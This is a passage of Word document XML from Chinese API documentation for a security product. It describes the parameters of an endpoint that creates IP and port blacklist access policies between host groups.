      <w:tr w:rsidR="00BC669E" w14:paraId="26807CBF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B924A9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>endIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26453949" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48B36D9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A3E7006" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="_Toc115166295"/>
      <w:bookmarkStart w:id="446" w:name="创建黑名单策略"/>
      <w:bookmarkEnd w:id="444"/>
      <w:r>
        <w:t>创建黑名单策略</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p w14:paraId="385C5858" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B5EA5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/black-strategy/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="62EC7C59"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563"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="283D753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56B53A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2173ED2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="775EBF32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08D9D7EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="423C19F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C5A753" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B102C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC46E26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00C28A31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F20850C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16BC2FD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstRealmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C83D84B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="790D8DE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="180912BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者范围，1:业务组、标签，2:自定义主机，3：自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68066B40" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D9CF388" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59375789" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B260646" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CCB8DA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09E82D49" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594D74CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B86D4A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E99185B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62484767" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="745E78EE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B1E0E75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstIpRanges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1D562D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F7FD49C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="160C63D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AA2A2DD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67523626" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F43B07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F89529C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6233070F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B496E4A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4EDF03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcRealmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68CE510D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E084D31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F86391A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者范围，1:业务组、标签，2:自定义主机，3：自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="746B5025" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B18F089" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66D0A7EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DC778CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18724FC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40706636" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53EE86E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00B99E97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C05BE73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33683971" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="38B15AA6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="330E0E5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcIpRanges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D4A0371" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B72D0FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC7F93C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A447B69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06EF62B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28AA6969" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C9AA8B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4446C6C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="116A3696" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="603F510C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78151465" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBC5B21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6400E551" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1131BC93" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32BCCA05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F9EFE22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6188096F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ADED22C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EBE6868" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C1C1E08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DB8EF73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AC6E0BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AA8F4A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="019C1773" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B85165" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayDstIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F1773F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01C7E61B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CD34F74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>目标IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A7F3869" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C3C3605" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>displaySrcIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF15435" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="213833E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
